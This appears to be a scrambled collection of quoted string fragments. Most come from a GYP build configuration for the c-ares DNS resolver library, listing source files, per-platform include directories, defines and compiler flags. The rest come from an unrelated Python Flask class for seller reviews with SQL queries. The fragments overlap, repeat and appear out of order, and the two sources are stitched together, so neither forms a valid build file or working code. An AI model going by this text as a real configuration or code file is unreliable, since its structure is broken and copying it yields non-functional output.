"'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c',",
"[ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources':",
"'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c',",
"'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [",
"[ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], },",
"[ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY'",
"'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"',",
"[ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"',",
"[ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [",
"'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h',",
"[ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [",
"[ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ]",
"'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c',",
"'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c',",
"'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c',",
"'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [",
"'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [",
"'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c',",
"'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }]",
"'-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not",
"'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c',",
"'--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h'",
"Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [",
"[ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c',",
"'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [",
"Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ]",
"'_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c'",
"] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib'",
"'-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in",
"'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c',",
"[ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ],",
"] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ]",
"[ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [",
"'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c',",
"'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c',",
"'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h',",
"[ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [",
"'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }],",
"{ 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', {",
"], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines':",
"'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [",
"{ 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs':",
"'-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [ '-g',",
"[ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [",
"'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources':",
"'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c',",
"'-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win",
"'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c',",
"'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c',",
"{ # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter'",
"[ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [",
"'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h',",
"'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h',",
"] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ],",
"'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h'",
"], }], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ],",
"'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries':",
"[ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [",
"'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c',",
"], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ]",
"'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c',",
"'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1',",
"}], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }],",
"'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h',",
"[ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags': [",
"[ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [",
"'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c',",
"] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [",
"'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h',",
"'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c',",
"}], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }],",
"{ 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h',",
"'OS not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"',",
"'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [",
"'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs':",
"'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags':",
"[ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', {",
"}], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }],",
"'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c',",
"[ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [",
"'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags':",
"], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ],",
"'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h',",
"}], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [",
"[ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources':",
"], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines':",
"POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ],",
"'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c',",
"['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ {",
"not in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', {",
"], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [",
"}] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include',",
"'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h',",
"'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c',",
"'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c',",
"}], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ],",
"'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, {",
"'_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets':",
"], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'],",
"}], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h'",
"'-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"',",
"{ 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or",
"'_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [",
"[ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c',",
"[ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [",
"'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib'",
"'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c',",
"'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries':",
"[ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl'",
"'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c',",
"'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd'",
"'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h'",
"'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c',",
"{ 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', {"
] |
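The 'conditions' blocks in a .gyp file all follow one shape: a condition string that GYP evaluates as a Python expression over build variables such as OS and library, a settings dict merged in when the condition holds, and an optional second dict merged in otherwise. As a rough sketch of that mechanism only (apply_conditions and its naive merge are illustrative inventions, not GYP's real implementation, which also expands variables and has more careful merge rules):

def apply_conditions(target, variables):
    # Each entry is [condition, then_dict] or [condition, then_dict, else_dict].
    for entry in target.get('conditions', []):
        cond, then_dict, *rest = entry
        else_dict = rest[0] if rest else None
        # GYP evaluates the condition string as a Python expression over the
        # build variables, e.g. OS=="win" or library=="static_library".
        chosen = then_dict if eval(cond, {}, variables) else else_dict
        if chosen:
            for key, value in chosen.items():
                if isinstance(value, list) and isinstance(target.get(key), list):
                    target[key].extend(value)  # lists accumulate
                else:
                    target[key] = value        # everything else overwrites
    return target

# Example: a linux static build picks up CARES_STATICLIB and config/linux.
cares = {
    'defines': [],
    'conditions': [
        ['library=="static_library"',
            {'defines': ['CARES_STATICLIB']},
            {'defines': ['CARES_BUILDING_LIBRARY']}],
        ['OS=="linux"', {'include_dirs': ['config/linux']}],
    ],
}
print(apply_conditions(cares, {'OS': 'linux', 'library': 'static_library'}))

Note also that 'OS not in "win android"' works because Python's `in` does a substring test on the string "win android", which is exactly how such conditions read in GYP files.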
from flask import current_app as app, flash, redirect, render_template, request, url_for
from flask_login import current_user
from sqlalchemy import exc
import datetime

# Reviews of Sellers
# CREATE TABLE SellerReview (
#     user_id INT NOT NULL REFERENCES Users(id),
#     seller_id INT NOT NULL REFERENCES Sellers(id),
#     date_time DATE NOT NULL,
#     description VARCHAR(256) NOT NULL,
#     rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5),
#     PRIMARY KEY (user_id, seller_id),
#     FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid)
# );

class SellerReview:
    def __init__(self, **kwargs):
        self.user_id = kwargs.get('user_id')
        self.seller_id = kwargs.get('seller_id')
        self.date_time = kwargs.get('date_time')
        self.description = kwargs.get('description', '')
        self.rating = kwargs.get('rating')
        self.exists = kwargs.get('exists')
        self.reviews = kwargs.get('reviews')
        self.last_review = kwargs.get('last_review')
        self.avg_rating = kwargs.get('avg_rating')
"# CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), #",
"row[3], rating = row[4], exists = True) for row in rows] # If",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND",
"= app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description,",
"exists a previous review, create the object if rows: return [SellerReview(user_id = row[0],",
"the object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time",
"''', user_id = user_id, offset = offset, seller_id = seller_id) # If there",
"this seller from this user except exc.IntegrityError as e: return 'you have already",
"all reviews for that seller if user_id is None: rows = app.db.execute(''' SELECT",
"= kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id =",
"a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get",
"If there exists a previous review, create the object if rows: return [SellerReview(user_id",
"date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset)",
"LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id =",
"= request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating)",
"Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id),",
"# Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body']",
"e: return 'you have already made a review for this seller' return 'Done'",
"NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL,",
"= seller_id, offset = offset) # If no passed in `seller_id`, then return",
"review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute('''",
